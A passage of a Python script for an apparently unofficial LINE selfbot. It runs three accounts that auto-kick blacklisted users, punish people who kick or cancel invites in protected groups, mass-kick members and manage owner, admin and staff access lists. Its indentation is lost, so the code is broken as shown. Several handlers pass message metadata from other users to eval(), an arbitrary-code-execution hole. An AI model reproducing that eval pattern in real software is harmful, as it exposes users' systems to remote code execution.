d23X_57 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_58 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
d23X_59 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 32 or op.type == 126:
if op.type == 32: print ("[ 32 ] NOTIFIED CANCEL INVITATION GROUP")
else: print ("[ 126 ] NOTIFIED CANCEL CHAT INVITATION")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck7 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_60 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_61 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_62 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M001D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_63 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_64 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_65 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M002D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_66 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_67 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_68 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M003D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_69 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_70 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_71 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.type == 55:
print ("[ 55 ] NOTIFIED READ MESSAGE")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck8 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 25 or op.type == 26:
# if op.type == 25: print ("[ 25 ] SEND MESSAGE")
# else: print ("[ 26 ] RECEIVE MESSAGE")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck9 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 22 or op.type == 24:
if op.type == 22: print ("[ 22 ] NOTIFIED INVITE INTO ROOM")
else: print ("[ 24 ] NOTIFIED LEAVE ROOM")
try:
a001.leaveRoom(op.param1)
except:
try:
a002.leaveRoom(op.param1)
except:
try:
a003.leaveRoom(op.param1)
except:
pass
if op.type == 25 or op.type == 26:
if op.type == 25: print ("[ 25 ] SEND MESSAGE")
else: print ("[ 26 ] RECEIVE MESSAGE")
global cmd
global text
global groupParam
msg = op.message
text = msg.text
reply = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 1 or msg.toType == 2:
if msg.toType == 0:
if sender != a001.profile.mid:
to = sender
else:
to = receiver
if msg.toType == 1:
to = receiver
if msg.toType == 2:
to = receiver
if msg.contentType == 1:
if sender in creator or sender in owner:
if M001D23 in settings["updatePict"]:
path = a001.downloadObjectMsg(msg.id)
del settings["updatePict"][M001D23]
a001.updateProfilePicture(path)
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if M002D23 in settings["updatePict"]:
path = a002.downloadObjectMsg(msg.id)
del settings["updatePict"][M002D23]
a002.updateProfilePicture(path)
a002.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if M003D23 in settings["updatePict"]:
path = a003.downloadObjectMsg(msg.id)
del settings["updatePict"][M003D23]
a003.updateProfilePicture(path)
a003.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if msg.contentType == 13:
if settings["addowner"] == True:
if sender in creator:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["owner"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Owner Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addowner"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["owner"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Owner".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addowner"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addowner"] = False
if settings["delowner"] == True:
if sender in creator:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["owner"]:
status["owner"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Owner".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delowner"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Owner Access")
settings["delowner"] = False
if settings["addadmin"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["admin"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Admin Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addadmin"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["admin"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Admin".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addadmin"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addadmin"] = False
if settings["deladmin"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["admin"]:
status["admin"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Admin".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["deladmin"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Admin Access")
settings["deladmin"] = False
if settings["addstaff"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["staff"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Staff Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addstaff"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["staff"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Staff".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addstaff"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addstaff"] = False
if settings["delstaff"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["staff"]:
status["staff"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Staff".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delstaff"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Staff Access")
settings["delstaff"] = False
if settings["addbots"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["mybots"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Squad List".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addbots"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["mybots"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Add To Squad".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addbots"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addbots"] = False
if settings["delbots"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["mybots"]:
status["mybots"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Delete From Squad".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delbots"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Squad List")
settings["delbots"] = False
if settings["addban"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["blacklist"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addban"] = False
else:
status["blacklist"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Add To Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addban"] = False
if settings["delban"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["blacklist"]:
status["blacklist"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Delete From Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delban"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Blacklist")
settings["delban"] = False
if msg.contentType == 0:
if text is None:
return
else:
hellterhead = command(text)
hlth = " ".join(hellterhead.split())
for hlth in hellterhead.split(' & '):
if hlth == "help":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(helpCmd))
elif hlth == "protection":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(proCmd))
elif hlth == "group":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(groupCmd))
elif hlth == "access":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(accessCmd))
elif hlth == "option":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(optCmd))
elif hlth == "settings":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(setCmd))
elif hlth.startswith("allowliff"):
if sender in creator or sender in owner or sender in admin or sender in staff:
try:
allowLiff()
a001.sendReplyMessage(reply,receiver,"Flex Mode Enable")
except:
a001.sendMessage(receiver,"line://app/1602687308-GXq4Vvk9/?type=text&text=セルボットDRE!")
elif hlth == "mention" or hlth == "tagall":
group = a001.getGroup(receiver)
memb = [contact.mid for contact in group.members]
a001.datamention(receiver,"{}".format(group.name),memb)
elif hlth == "reboot":
if sender in creator or sender in owner:
a001.sendMessage(receiver,"[ Rebooting... ]")
settings["restartPoint"] = receiver
restartProgram()
elif hlth == "shutdown":
if sender in creator or sender in owner:
a001.sendMessage(receiver,"[ Turn Off Program ]")
sys.exit('\n》》》》PROGRAM TERMINATED《《《《\n')
elif hlth == "clearchat":
if sender in creator or sender in owner or sender in admin:
for x in Botslist:
x.removeAllMessages(op.param2)
for z in Botslist:
z.sendReplyMessage(reply,receiver,"[ All Chat Cleared ]")
elif hlth == "creator":
sendFooter(receiver,str(dreX53))
elif hlth == "about":
sendFooter(receiver,str(aboutCmd))
elif hlth == "me":
contact = a001.getContact(sender)
a001.sendContact(receiver, contact.mid)
elif hlth == "mid":
contact = a001.getContact(sender)
a001.sendReplyMessage(reply,receiver, "{}".format(contact.mid))
elif hlth.startswith("mid "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
mcont = ""
for ls in lists:
mcont += "{}".format(str(ls))
a001.sendReplyMessage(reply,receiver,str(mcont))
elif hlth.startswith("contact "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = a001.getContact(ls)
cont = contact.mid
a001.sendContact(receiver, cont)
elif hlth == "ping":
a001.sendMessage(receiver,"PING!!!")
a002.sendMessage(receiver,"PING!!!")
a003.sendMessage(receiver,"PING!!!")
elif hlth == "respon":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,"[ {} ]".format(resp1))
a002.sendReplyMessage(reply,receiver,"[ {} ]".format(resp2))
a003.sendReplyMessage(reply,receiver,"[ {} ]".format(resp3))
elif hlth == "speed":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,logspeed())
a002.sendReplyMessage(reply,receiver,logspeed())
a003.sendReplyMessage(reply,receiver,logspeed())
elif hlth == "debug":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,debug())
a002.sendReplyMessage(reply,receiver,debug())
a003.sendReplyMessage(reply,receiver,debug())
elif hlth == "ginfo":
if sender in creator or sender in owner or sender in admin or sender in staff:
group = a001.getGroup(receiver)
try:
gCreator = group.creator.displayName
except:
gCreator = "Not Found"
if group.invitee is None:
gPending = "0"
else:
gPending = str(len(group.invitee))
if group.preventedJoinByTicket == True:
gQr = "Clossed"
gTicket = "Nothing"
else:
gQr = "Opened"
gTicket = "https://line.me/R/ti/g/{}".format(str(a001.reissueGroupTicket(group.id)))
hlthX = "[ Group Info ]"
hlthX += "\n- Group Name: {}".format(str(group.name))
hlthX += "\n- Group ID: {}".format(group.id)
hlthX += "\n- Creator: {}".format(str(gCreator))
hlthX += "\n- Member: {}".format(str(len(group.members)))
hlthX += "\n- Pending: {}".format(gPending)
hlthX += "\n- Group URL: {}".format(gQr)
hlthX += "\n- Group Ticket: {}".format(gTicket)
a001.sendReplyMessage(reply,receiver,hlthX)
elif hlth == "openqr":
if sender in creator or sender in owner or sender in admin:
group = a001.getGroup(receiver)
group.preventedJoinByTicket = False
a001.updateGroup(group)
gurl = a001.reissueGroupTicket(receiver)
a001.sendReplyMessage(reply,receiver,"QR Group Opened")
a001.sendReplyMessage(reply,receiver,"line://ti/g/" + gurl)
elif hlth == "closeqr":
if sender in creator or sender in owner or sender in admin:
group = a001.getGroup(receiver)
group.preventedJoinByTicket = True
a001.updateGroup(group)
a001.sendReplyMessage(reply,receiver,"QR Group Closed")
elif hlth == "leave":
if sender in creator or sender in owner or sender in admin:
for bot in Botslist:
bot.leaveGroup(receiver)
elif hlth.startswith("leave "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("leave ","")
if spl == "1":
a001.leaveGroup(receiver)
if spl == "2":
a002.leaveGroup(receiver)
if spl == "3":
a003.leaveGroup(receiver)
elif hlth == "join":
if sender in creator or sender in owner or sender in admin:
G = a001.getGroup(receiver)
G.preventedJoinByTicket = False
a001.updateGroup(G)
links = a001.reissueGroupTicket(receiver)
a002.acceptGroupInvitationByTicket(receiver,links)
a003.acceptGroupInvitationByTicket(receiver,links)
G = a001.getGroup(receiver)
G.preventedJoinByTicket = True
a001.updateGroup(G)
elif hlth == "blacklist" or hlth == "banlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
if len(status["blacklist"]) > 0:
h = [a for a in status["blacklist"]]
k = len(h)//20
for aa in range(k+1):
if aa == 0:dd = '┏━ Blacklist User';no=aa
else:dd = '';no=aa*20
msgas = dd
for a in h[aa*20:(aa+1)*20]:
no+=1
if no == len(h):
msgas+='\n┣ {}. @!'.format(no)
else:
msgas += '\n┣ {}. @!'.format(no)
msgas += '\n┗━━━━'
sendMention(to, msgas, h[aa*20:(aa+1)*20])
else:
a001.sendReplyMessage(reply,receiver,"[ Doesn't Have Any Blacklist User ]")
elif hlth == "clearban":
if sender in creator or sender in owner or sender in admin:
if len(status["blacklist"]) > 0:
a001.sendReplyMessage(reply,receiver, "[ {} User Cleared ]".format(len(status["blacklist"])))
status["blacklist"].clear()
else:
a001.sendReplyMessage(reply,receiver,"[ Doesn't Have Any Blacklist User ]")
elif hlth == "squad list":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
a = 0
for ls in mybots:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(reply,receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Bots\n"+ma+"┗━ Total [ %s ] Bots" %(str(len(mybots))))
elif hlth == "view bots":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
a = 0
for ls in Bots:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(reply,receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Bots\n"+ma+"┗━ Total [ %s ] Bots" %(str(len(Bots))))
elif hlth == "view access":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
mb = ""
mc = ""
md = ""
a = 0
b = 0
c = 0
d = 0
for ls in creator:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
for ls in owner:
b = b + 1
end = '\n'
mb += '┣ ' + str(b) + ". " +a001.getContact(ls).displayName + "\n"
for ls in admin:
c = c + 1
end = '\n'
mc += '┣ ' + str(c) + ". " +a001.getContact(ls).displayName + "\n"
for ls in staff:
d = d + 1
end = '\n'
md += '┣ ' + str(d) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(msg.id, to, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Access\n┣━━━━ Creator\n"+ma+"┣━━━━ Owner\n"+mb+"┣━━━━ Admin\n"+mc+"┣━━━━ Staff\n"+md+"┗━ Total [ %s ] Access" %(str(len(creator)+len(owner)+len(admin)+len(staff))))
elif hlth.startswith("add owner"):
if sender in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["owner"].append(target)
sendMention(to,"[ Add Owner ]\nUser @! Added To Owner Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Owner ]\nCreator Permission")
elif hlth.startswith("del owner"):
if sender in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["owner"].remove(target)
sendMention(to,"[ Delete Owner ]\nUser @! Deleted From Owner Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Owner ]\nCreator Permission")
elif hlth.startswith("add admin"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["admin"].append(target)
sendMention(to,"[ Add Admin ]\nUser @! Added To Admin Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Admin ]\nOwner Permission")
elif hlth.startswith("del admin"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["admin"].remove(target)
sendMention(to,"[ Delete Admin ]\nUser @! Deleted From Admin Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Admin ]\nOwner Permission")
elif hlth.startswith("add staff"):
if sender in creator or sender in owner or sender in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["staff"].append(target)
sendMention(to,"[ Add Staff ]\nUser @! Added To Staff Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Staff ]\nOwner/Admin Permission")
elif hlth.startswith("del staff"):
if sender in creator or sender in owner or sender in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["staff"].remove(target)
sendMention(to,"[ Delete Staff ]\nUser @! Deleted From Staff Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Staff ]\nOwner/Admin Permission")
elif hlth.startswith("add squad"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["mybots"].append(target)
sendMention(to,"[ Add Squad ]\nUser @! Added To Squad List",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Squad ]\nOwner Permission")
elif hlth.startswith("del squad"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["mybots"].remove(target)
sendMention(to,"[ Delete Squad ]\nUser @! Deleted From Squad List",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Squad ]\nOwner Permission")
elif hlth.startswith("add ban"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["blacklist"].append(target)
sendMention(to,"[ Add Blacklist ]\nUser @! Added To Blacklist User",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Blacklist ]\nOwner Permission")
elif hlth.startswith("del ban"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["blacklist"].remove(target)
sendMention(to,"[ Delete Blacklist ]\nUser @! Deleted From Blacklist User",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Blacklist ]\nOwner Permission")
elif hlth.startswith("owner:"):
if sender in creator:
spl = hlth.replace("owner:","")
if spl == "recruit":
settings["addowner"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Owner ]\nPlease Send Contact To Add")
if spl == "expel":
settings["delowner"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Owner ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nCreator Permission")
elif hlth.startswith("admin:"):
if sender in creator or sender in owner:
spl = hlth.replace("admin:","")
if spl == "recruit":
settings["addadmin"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Admin ]\nPlease Send Contact To Add")
if spl == "expel":
settings["deladmin"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Admin ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth.startswith("staff:"):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("staff:","")
if spl == "recruit":
settings["addstaff"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Staff ]\nPlease Send Contact To Add")
if spl == "expel":
settings["delstaff"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Staff ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nAdmin Permission")
elif hlth.startswith("squad:"):
if sender in creator or sender in owner:
spl = hlth.replace("squad:","")
if spl == "add":
settings["addbots"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Squad ]\nPlease Send Contact To Add")
if spl == "del":
settings["delbots"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Squad ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth.startswith("ban:"):
if sender in creator or sender in owner:
spl = hlth.replace("ban:","")
if spl == "add":
settings["addban"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Blacklist ]\nPlease Send Contact To Add")
if spl == "del":
settings["delban"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Blacklist ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth == "abort" or hlth == "eject":
if sender in creator:
settings["addadmin"] = False
settings["addban"] = False
settings["addbots"] = False
settings["addowner"] = False
settings["addstaff"] = False
settings["deladmin"] = False
settings["delban"] = False
settings["delbots"] = False
settings["delowner"] = False
settings["delstaff"] = False
a001.sendReplyMessage(reply,receiver,"Command Aborted")
elif hlth.startswith("grouplist "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("grouplist ","")
if spl == "1":
group = a001.getGroupIdsJoined()
getg = a001.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp1)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a001.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
if spl == "2":
group = a002.getGroupIdsJoined()
getg = a002.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp2)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a002.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
if spl == "3":
group = a003.getGroupIdsJoined()
getg = a003.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp3)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a003.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
elif hlth == "memberlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
getg = a001.getGroup(receiver)
no = 1
ret = "┏━ Member List\n┣━━━━ {}".format(getg.name)
if getg.members is None:
a001.sendReplyMessage(reply,receiver,"Not Found")
else:
for i in getg.members:
ret += "\n┣ {}. {}".format(no,a001.getContact(i.mid).displayName)
no = (no+1)
ret += "\n┗━ Total [ %i ] Member" % len(getg.members)
a001.sendReplyMessage(reply,receiver,ret)
elif hlth == "pendinglist":
if sender in creator or sender in owner or sender in admin or sender in staff:
getg = a001.getGroup(receiver)
no = 1
ret = "┏━ Pending List\n┣━━━━ {}".format(getg.name)
if getg.invitee is None:
a001.sendReplyMessage(reply,receiver,"Not Found")
else:
for i in getg.invitee:
ret += "\n┣ {}. {}".format(no,a001.getContact(i.mid).displayName)
no = (no+1)
ret += "\n┗━ Total [ %i ] Pending" % len(getg.invitee)
a001.sendReplyMessage(reply,receiver,ret)
elif hlth == "protectlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
mb = ""
a = 0
b = 0
for ls in promax:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getGroup(ls).name + "\n"
for ls in strictmode:
b = b + 1
end = '\n'
mb += '┣ ' + str(b) + ". " +a001.getGroup(ls).name + "\n"
a001.sendReplyMessage(reply, receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Protect\n┣━━━━ Protect Max\n"+ma+"┣━━━━ Strict Mode\n"+mb+"┗━ Total [ %s ] Protection" %(str(len(promax)+len(strictmode))))
elif hlth == "purge":
if sender in creator or sender in owner:
group = a001.getGroup(receiver)
gMembMids = [contact.mid for contact in group.members]
match = []
for target in status["blacklist"]:
match+=filter(lambda str: str == target, gMembMids)
if match == []:
a001.sendReplyMessage(reply,receiver,"Nothing")
return
for fck in match:
try:
fckX = threading.Thread(target=kick, args=(receiver, fck)).start()
except:
pass
elif hlth.startswith("protect "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("protect ","")
if spl == "max":
if receiver in status["promax"]:
hlth = "Group Protection Max"
else:
status["promax"].append(receiver)
hlth = "Access Granted - Protection Active"
try:
group = a001.getGroup(receiver)
if group.preventedJoinByTicket == False:
progqr = a001.getGroup(receiver)
progqr.preventedJoinByTicket = True
a001.updateGroup(progqr)
settings["changeGroupName"][receiver] = group.name
settings["changeGroupPicture"][receiver] = group.pictureStatus
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
pass
a001.sendReplyMessage(reply,receiver,"[ Protection ]\n" + hlth)
if spl == "none":
if receiver in status["promax"]:
status["promax"].remove(receiver)
hlth = "Access Granted - Protection Nonactive"
else:
hlth = "Group Protection None"
a001.sendReplyMessage(reply,receiver,"[ Protection ]\n" + hlth)
elif hlth.startswith("strictmode "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("strictmode ","")
if spl == "on":
if receiver in status["strictmode"]:
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nStill Active")
else:
status["strictmode"].append(receiver)
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nAccess Granted - Strict Mode Enable")
try:
a001.inviteIntoGroup(receiver,[M003D23])
except:
try:
